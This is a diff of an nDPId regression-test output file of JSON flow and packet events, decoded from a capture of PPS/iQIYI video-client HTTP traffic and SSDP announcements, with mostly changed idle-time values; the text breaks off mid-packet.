-01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} +01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="} +00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01016{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1467353189784,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":473,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":473,"pkt_l4_len":439,"thread_ts_msec":1467353189784,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHLI6UAAAER3rTAqAUm7\/\/\/+gdsB2wBt3SETk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xOTIuMTY4LjUuMzg6Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjJmNjg4ZWNlLWMwYjEtNDEwNC1iOWU1LWNiY2VlNTAzZTZiNA0KVVNOOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0Ojp1cG5wOnJvb3RkZXZpY2UNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -323,210 +323,210 @@ 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1467353189831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1467353189831,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHUI6YAAAER3qrAqAUm7\/\/\/+gdsB2wBwIVJTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 01084{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1467353189909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":525,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":525,"pkt_l4_len":491,"thread_ts_msec":1467353189909,"pkt":"AQBef\/\/6cBiLE+IdCABFAAH\/I6cAAAER3n7AqAUm7\/\/\/+gdsB2wB6x3GTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQ6OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpDYWNoZS1Db250cm9sOm1heC1hZ2U9OTAwDQpTZXJ2ZXI6TWljcm9zb2Z0LVdpbmRvd3MvNi4yIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6MDAyODViYzNjM2JhMjA3MDA3ZTFjM2I3NjIxYzg0NzYNCg0K"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} -01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMUINClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZ